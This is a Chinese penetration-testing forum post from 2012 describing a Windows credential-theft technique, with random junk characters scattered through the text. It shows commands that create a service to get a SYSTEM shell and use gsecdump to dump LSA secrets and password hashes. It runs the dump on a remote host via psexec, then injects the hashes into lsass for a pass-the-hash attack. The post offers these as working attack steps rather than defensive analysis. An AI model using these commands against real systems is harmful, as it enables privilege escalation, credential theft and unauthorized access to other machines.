找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
返回列表 发新帖
查看: 2775|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:9 }7 x. n5 j/ n5 Y7 f# K

) H# F7 t& H4 g' @( ?4 U4 yC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
" D8 |, S8 Q) m5 M# ?; V/ P; d[SC] CreateService SUCCESS& z8 @- `3 _7 c- s' X( v* x; n. P# ~: H

, ?, O! `; B* \C:\>sc start shellcmdline
* `2 n  O4 s, v9 M# K[SC] StartService FAILED 1053:
% i8 W3 @" f1 O: o" {
* @/ [) ~7 {( X( S3 WThe service did not respond to the start or control request in a timely fashion.
6 F- W- a4 j4 g7 t' p) {2 ^, T( Z! L( V
C:\>sc delete shellcmdline
2 Z$ a" I$ }1 w# v/ G& C[SC] DeleteService SUCCESS, m, o, D* B5 R$ z# S

& R! \; k4 z" n------------3 D! g% R9 z' }/ |- |
% c# v& L! T: [2 N( g- M+ M& K2 H
Then in the new DOS window:& f/ A) r  f* K6 }

( y" H6 T5 Y! c8 E2 \, ~& d; V7 NMicrosoft Windows XP [Version 5.1.2600]0 d+ h: d1 `2 D' R8 o
(C) Copyright 1985-2001 Microsoft Corp.+ K0 P9 J2 o% \

, Y& P! X& c6 F/ g5 F5 B0 kC:\WINDOWS\system32>whoami  ~4 P& P: K2 e7 X
NT AUTHORITY\SYSTEM
' g2 [) {' I8 y( ?, m. n! y! Z* ^
7 M9 B& ]3 S/ P' f, g8 q1 {6 |C:\WINDOWS\system32>gsecdump -h
# v3 o6 |2 O1 L: hgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)' g# \% T2 M: D8 o9 _
usage: gsecdump [options]
, I' e" ?8 e" f/ n  j0 O1 T! ]
/ a( g6 i8 b# Y* ~6 ]1 S- V" ~options:
9 e6 K) b$ w- Y; o! `: d2 V-h [ --help ] show help* ^- B$ _* U& r% O
-a [ --dump_all ] dump all secrets
3 D$ I! Z! Q: s9 l-l [ --dump_lsa ] dump lsa secrets
+ h: X& }9 a7 m% h: d2 r) M5 O-w [ --dump_wireless ] dump microsoft wireless connections
- @" a7 @3 d% j* ~-u [ --dump_usedhashes ] dump hashes from active logon sessions
; ?3 x2 @3 }+ S$ x! w-s [ --dump_hashes ] dump hashes from SAM/AD/ c% i5 `" i4 _2 f/ Y# t% j

& Q% U1 s: L/ H  o  [8 i6 G6 n" c5 \. QAlthough I like to use:6 o& q8 h0 l2 O  f/ P# [
/ F+ |7 m, g: U4 a8 q6 R1 u
PsExec v1.83 - Execute processes remotely
, G; F' }5 R8 b, v1 ?. p# k3 ICopyright (C) 2001-2007 Mark Russinovich$ ?# D% {0 c) }9 l( K0 {* U# e( ^
Sysinternals - 链接标记[url]www.sysinternals.com[/url]! e! V, [* b3 {7 @
- ]! R! a$ G5 k; v
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
# [/ G. o5 e3 `9 L! M8 p
# u7 U7 G: a, d# ato get the hashes from active logon sessions of a remote system.
, w9 u/ D( O: n  y6 i) @. W7 w; w$ G- A8 r
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.0 i; C- E# o0 |
) Z7 z) f/ ]- B7 L+ s
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.  A1 ]$ _) |3 O+ I5 @
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]2 q8 j) Y1 Z  r
. z: R: {9 l- Q/ @
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。# n. e0 @  ?, i+ J8 i6 [9 U! c
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表